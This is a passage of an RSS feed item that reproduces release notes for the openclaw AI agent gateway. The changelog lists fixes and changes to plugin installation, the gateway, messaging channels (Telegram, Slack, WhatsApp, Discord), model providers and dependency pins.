<p>Status: show the <code>openai-codex</code> OAuth profile for <code>openai/gpt-*</code> sessions running through the native Codex runtime instead of reporting auth as unknown. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369662899" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76197" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76197/hovercard" href="https://github.com/openclaw/openclaw/pull/76197">#76197</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</p>
</li>
<li>
<p>Gateway: avoid repeated plugin tool descriptor config hashing so large runtime configs do not block reply startup and trigger reconnect/timeouts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367851232" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75944" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75944/hovercard" href="https://github.com/openclaw/openclaw/issues/75944">#75944</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</p>
</li>
<li>
<p>Plugins/externalization: keep diagnostics ClawHub packages and persisted bundled-plugin relocation on npm-first install metadata for launch, and omit Discord from the core package now that its external package is published. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Setup/TUI: bound the Terminal hatch bootstrap run so a stalled provider request times out instead of leaving first-run hatching stuck behind the watchdog. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369916791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76241" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76241/hovercard" href="https://github.com/openclaw/openclaw/pull/76241">#76241</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</p>
</li>
<li>
<p>Cron/CLI runtimes: route isolated cron jobs through configured per-agent CLI runtimes only when the resolved model provider is compatible, so OpenAI job overrides no longer inherit a mismatched Claude CLI backend. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a>.</p>
</li>
<li>
<p>Plugins/Codex: allow the official npm Codex plugin to install without the unsafe-install override, keep <code>/codex</code> command ownership, and cover the real npm Docker live path through managed <code>.openclaw/npm</code> dependencies plus uninstall failure proof.</p>
</li>
<li>
<p>Gateway/status: add concrete service, config, listener-owner, and log collection next steps when gateway probes fail and Bonjour finds no local gateway, so frozen or port-conflict reports include the data needed for root-cause triage. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4088411746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49012" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49012/hovercard" href="https://github.com/openclaw/openclaw/issues/49012">#49012</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Codex harness: forward OpenClaw workspace bootstrap files such as <code>SOUL.md</code> through native Codex config instructions while leaving <code>AGENTS.md</code> to Codex project-doc discovery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370133135" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76273" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76273/hovercard" href="https://github.com/openclaw/openclaw/issues/76273">#76273</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zknicker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zknicker">@zknicker</a>.</p>
</li>
<li>
<p>Parallels/Windows update smoke: escape the stale post-swap import regex in the generated PowerShell script so expected <code>ERR_MODULE_NOT_FOUND</code> update handoffs continue to post-update health checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362062644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75315" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75315/hovercard" href="https://github.com/openclaw/openclaw/pull/75315">#75315</a>)</p>
</li>
<li>
<p>Slack: allow draft preview streaming in top-level DMs when <code>replyToMode</code> is <code>off</code> while keeping Slack native streaming and assistant thread status gated on reply threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160487114" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56480" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56480/hovercard" href="https://github.com/openclaw/openclaw/issues/56480">#56480</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161016971" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56544" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56544/hovercard" href="https://github.com/openclaw/openclaw/pull/56544">#56544</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HangGlidersRule/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HangGlidersRule">@HangGlidersRule</a>.</p>
</li>
<li>
<p>Control UI/chat: remove the delete-confirm popover outside-click listener on every dismiss path, so Cancel, Delete, outside clicks, and same-button toggles no longer leave stale document listeners behind. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363970635" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75590" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75590/hovercard" href="https://github.com/openclaw/openclaw/pull/75590">#75590</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306731173" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69982" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69982/hovercard" href="https://github.com/openclaw/openclaw/pull/69982">#69982</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ricardo-M-L/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ricardo-M-L">@Ricardo-M-L</a>.</p>
</li>
<li>
<p>Memory-core: treat exhausted file watcher limits as non-fatal for builtin memory auto-sync while preserving fatal handling for unrelated disk-full errors. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341250108" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73357" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73357/hovercard" href="https://github.com/openclaw/openclaw/pull/73357">#73357</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solodmd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solodmd">@solodmd</a>.</p>
</li>
<li>
<p>Providers/Ollama: restore catalog context-window forwarding as <code>num_ctx</code> for native <code>/api/chat</code> requests; fixes tool selection and context truncation regressions on models with catalog entries (qwen3, llama3, gemma3, …) when no explicit <code>params.num_ctx</code> was configured. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369209198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76117" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76117/hovercard" href="https://github.com/openclaw/openclaw/issues/76117">#76117</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369585251" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76181" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76181/hovercard" href="https://github.com/openclaw/openclaw/pull/76181">#76181</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</p>
</li>
<li>
<p>Plugins/install: pin npm plugin installs to the verified resolved version and reject package-lock version or integrity drift, so mutable tags cannot race integrity checks into accepting a different artifact. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</p>
</li>
<li>
<p>Plugins/providers: preserve scoped cold-load fallback for enabled external manifest-contract capability providers missing from the startup registry, so providers such as Fish Audio can resolve on request without requiring <code>activation.onStartup</code> for correctness. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371180492" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76536" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76536/hovercard" href="https://github.com/openclaw/openclaw/pull/76536">#76536</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Conan-Scott/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Conan-Scott">@Conan-Scott</a>.</p>
</li>
<li>
<p>Gateway/update: carry <code>continuationMessage</code> from <code>update.run</code> into successful restart sentinels so session-scoped self-updates can resume one follow-up turn after the Gateway restarts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324435284" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71178" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71178/hovercard" href="https://github.com/openclaw/openclaw/issues/71178">#71178</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350993039" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74362" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74362/hovercard" href="https://github.com/openclaw/openclaw/pull/74362">#74362</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100menotu001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100menotu001">@100menotu001</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HeilbronAILabs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HeilbronAILabs">@HeilbronAILabs</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/artnking/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/artnking">@artnking</a>.</p>
</li>
<li>
<p>Agents/fallback: suppress duplicate current-turn user-message transcript writes after embedded fallback retries while still sending the retry prompt to the model. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231528900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63696" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63696/hovercard" href="https://github.com/openclaw/openclaw/pull/63696">#63696</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dashhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dashhuang">@dashhuang</a>.</p>
</li>
<li>
<p>Channels/Telegram: force a fresh final message when a visible non-preview bubble (tool/block/error) was delivered after the active answer preview, so multi-step assistant replies no longer end up with the final answer above intermediate output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371163135" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76529" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76529/hovercard" href="https://github.com/openclaw/openclaw/issues/76529">#76529</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jack-stormentswe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jack-stormentswe">@jack-stormentswe</a>.</p>
</li>
<li>
<p>Channels/Telegram: require an observed Telegram send, edit, or fallback before treating a forum-topic final as delivered, so final replies generated in transcript no longer disappear from Telegram topics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371235088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76554" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76554/hovercard" href="https://github.com/openclaw/openclaw/issues/76554">#76554</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372160301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76764" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76764/hovercard" href="https://github.com/openclaw/openclaw/pull/76764">#76764</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bubucilo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bubucilo">@bubucilo</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</p>
</li>
<li>
<p>Plugins/update: keep externalized bundled npm bridge updates on the normal plugin security scanner path instead of granting source-linked official trust without artifact provenance. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372163499" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76765/hovercard" href="https://github.com/openclaw/openclaw/pull/76765">#76765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</p>
</li>
<li>
<p>Agents/reply context: label replied-to messages as the current user message target in model-visible metadata, so short replies are grounded to their explicit reply target instead of nearby chat history. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372371547" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76817" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76817/hovercard" href="https://github.com/openclaw/openclaw/pull/76817">#76817</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</p>
</li>
<li>
<p>Doctor/plugins: install configured missing official plugins such as Discord and Brave during doctor/update repair, auto-enable repaired provider plugins, preserve config when a download fails, and stop auto-enable from inventing plugin entries when no manifest declares a configured channel. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372587442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76872" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76872/hovercard" href="https://github.com/openclaw/openclaw/issues/76872">#76872</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jack-stormentswe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jack-stormentswe">@jack-stormentswe</a>.</p>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.2]]></title>
<description><![CDATA[2026.5.2
Highlights

External plugin installation, update, doctor repair, dependency reporting, and artifact metadata now cover the npm-first cutover, stale configured installs, missing package payloads, and beta-channel plugin fallback. Thanks @vincentkoc.
Gateway and agent hot paths are leaner ...]]></description>
<link>https://tsecurity.de/de/3482973/downloads/openclaw-202652/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3482973/downloads/openclaw-202652/</guid>
<pubDate>Sun, 03 May 2026 01:46:19 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.2</h2>
<h3>Highlights</h3>
<ul>
<li>External plugin installation, update, doctor repair, dependency reporting, and artifact metadata now cover the npm-first cutover, stale configured installs, missing package payloads, and beta-channel plugin fallback. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway and agent hot paths are leaner across startup, session listing, task maintenance, prompt prep, plugin loading, tool descriptor planning, filesystem guards, and large runtime configs.</li>
<li>Control UI and WebChat are more resilient across Sessions, Cron, long-running Gateway WebSockets, grouped-message width, slash-command feedback, iOS PWA bounds, selection contrast, and Talk diagnostics.</li>
<li>Messaging fixes cover WhatsApp Channel/Newsletter targets, Telegram topic commands and networking, Discord delivery/startup edge cases, Slack threads, Signal groups/media, and visible reply routing.</li>
<li>Provider and media fixes cover OpenAI-compatible TTS/Realtime, OpenRouter/DeepSeek replay, Anthropic-compatible streaming, LM Studio reasoning metadata, Brave/SearXNG/Firecrawl web search, media paths, music, and voice-call routing.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Gateway/startup and restart: skip plugin-backed auth-profile overlays during startup secrets preflight, reducing gateway readiness latency while keeping reload and OAuth recovery paths overlay-capable; add <code>openclaw gateway restart --force</code> and <code>--wait &lt;duration&gt;</code>, log active task run IDs before restart deferral timers, and report timeout restarts as explicit forced restarts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285812464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68327" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68327/hovercard" href="https://github.com/openclaw/openclaw/pull/68327">#68327</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JIRBOY/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JIRBOY">@JIRBOY</a>.</li>
<li>Plugins/ClawHub: make diagnostics, onboarding, doctor repair, and channel setup carry ClawPack metadata through install records while keeping explicit <code>clawhub:</code> installs on ClawHub and bare package installs on npm for the launch cutover. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: include package dependency install state in <code>openclaw plugins list --json</code> so scripts can spot missing plugin dependencies without runtime-loading plugins.</li>
<li>Plugins/update: on the beta OpenClaw update channel, default-line npm and ClawHub plugin updates try <code>@beta</code> first and fall back to default/latest when no plugin beta release exists.</li>
<li>Plugins/runtime: scope broad runtime preloads to the effective plugin ids derived from config, startup planning, configured channels, slots, and auto-enable rules instead of importing every discoverable plugin.</li>
<li>Agents/runtime: reuse the startup-loaded plugin registry for request-time providers, tools, channel actions, web/capability/memory/migration helpers, and memoized provider extra-params, and memoize transcript replay-policy resolution for stable config and process-env runs while preserving model-specific transport hook patches and custom-env provider behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</li>
<li>Infra/path-guards: add a fast path for canonical absolute POSIX containment checks, avoiding repeated <code>path.resolve</code> and <code>path.relative</code> work in hot filesystem walkers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529908" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75895" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75895/hovercard" href="https://github.com/openclaw/openclaw/issues/75895">#75895</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363840300" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75575" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75575/hovercard" href="https://github.com/openclaw/openclaw/issues/75575">#75575</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289737301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68782" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68782/hovercard" href="https://github.com/openclaw/openclaw/issues/68782">#68782</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Enderfga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Enderfga">@Enderfga</a>.</li>
<li>Tools/plugins: add a platform-level tool descriptor planner for descriptor-first visibility, generic availability checks, and executor references, and cache plugin tool descriptors captured from <code>api.registerTool(...)</code> so repeated prompt-time planning can skip plugin runtime loading while execution still loads the live plugin tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368991903" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76079" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76079/hovercard" href="https://github.com/openclaw/openclaw/pull/76079">#76079</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Docs/Codex: clarify that ChatGPT/Codex subscription setups should use <code>openai/gpt-*</code> with <code>agentRuntime.id: "codex"</code> for native Codex runtime, while <code>openai-codex/*</code> remains the PI OAuth route. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Plugins/source checkout: load bundled plugins from the <code>extensions/*</code> pnpm workspace tree in source checkouts, so plugin-local dependencies and edits are used directly while packaged installs keep using the built runtime tree. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/beta: externalize ACPX behind <code>@openclaw/acpx</code> and diagnostics OpenTelemetry behind <code>@openclaw/diagnostics-otel</code>, keeping their heavier runtime stacks out of the core package until installed; prepare Google Chat, LINE, Matrix, Mattermost, BlueBubbles, diagnostics Prometheus, Google Meet, Nextcloud Talk, Nostr, Zalo, Zalo Personal, diagnostics OpenTelemetry, Discord, Diffs, Lobster, Memory LanceDB, Microsoft Teams, QQ Bot, Voice Call, WhatsApp, Brave, Codex, Feishu, Synology Chat, Tlon, and Twitch for <code>2026.5.1-beta.1</code>/<code>2026.5.1-beta.2</code> npm and ClawHub publishing, and keep publishable plugin dist trees out of the core npm package. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/xAI: add Grok 4.3 to the bundled catalog and make it the default xAI chat model.</li>
<li>Google Meet: let API-created rooms set <code>accessType</code> and <code>entryPointAccess</code>, add <code>googlemeet end-active-conference</code> for closing managed spaces after a call, and add <code>googlemeet test-listen</code> plus the matching <code>google_meet</code> <code>test_listen</code> action so transcribe-mode joins wait for real caption or transcript movement before reporting listen-first health. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355261280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74824" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74824/hovercard" href="https://github.com/openclaw/openclaw/pull/74824">#74824</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BsnizND/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BsnizND">@BsnizND</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Plugins/ClawHub/onboarding: prefer versioned ClawPack artifacts when ClawHub publishes digest metadata, verify ClawPack response headers and downloaded bytes, persist ClawPack digest/artifact metadata on install/update records and install-on-demand provider setup entries, and allow official bundled-plugin cutovers to record ClawHub artifact metadata while preserving npm as the launch default for bare package specs and retaining npm/local fallback paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/Crestodian: add ClawHub plugin search plus Crestodian plugin list/search/install/uninstall operations, with approval and audit coverage for install and uninstall.</li>
<li>Channels/thread bindings: replace split subagent/ACP thread-spawn toggles with <code>threadBindings.spawnSessions</code>, default thread-bound spawns on, and let <code>openclaw doctor --fix</code> migrate the legacy keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367850512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75943/hovercard" href="https://github.com/openclaw/openclaw/pull/75943">#75943</a>)</li>
<li>Providers/OpenAI: add <code>extraBody</code>/<code>extra_body</code> passthrough for OpenAI-compatible TTS endpoints, so custom speech servers can receive fields such as <code>lang</code> in <code>/audio/speech</code> requests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041341848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39900" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39900/hovercard" href="https://github.com/openclaw/openclaw/issues/39900">#39900</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/R3NK0R/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/R3NK0R">@R3NK0R</a>.</li>
<li>Channels/WhatsApp: support explicit WhatsApp Channel/Newsletter <code>@newsletter</code> outbound message targets with channel session metadata instead of DM routing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3921599881" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/13417" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/13417/hovercard" href="https://github.com/openclaw/openclaw/issues/13417">#13417</a>; carries forward the narrow outbound target idea from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3921655588" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/13424" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/13424/hovercard" href="https://github.com/openclaw/openclaw/pull/13424">#13424</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/agentz-manfred/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/agentz-manfred">@agentz-manfred</a>.</li>
<li>Dependencies: refresh workspace, bundled runtime, and plugin dependency pins, including TypeBox 1.1.37, AWS SDK 3.1041.0, Microsoft Teams 2.0.9, Marked 18.0.3, Pi 0.71.1, OpenAI 6.35.0, Codex 0.128.0, Zod 4.4.1, and Matrix 41.4.0. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/aws/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aws">@aws</a>, and <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/microsoft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/microsoft">@microsoft</a>.</li>
<li>Discord/channels: add reusable message-channel access groups plus Discord channel-audience DM authorization, so allowlists can reference <code>accessGroup:&lt;name&gt;</code> across channel auth paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366657956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75813" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75813/hovercard" href="https://github.com/openclaw/openclaw/pull/75813">#75813</a>)</li>
<li>Crabbox/scripts: print the selected Crabbox binary, version, and supported providers before <code>pnpm crabbox:*</code> commands, and reject stale binaries that lack <code>blacksmith-testbox</code> provider support.</li>
<li>Agents/Codex: add committed happy-path prompt snapshots for Codex/message-tool Telegram direct, Discord group, and heartbeat turns so prompt drift can be reviewed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
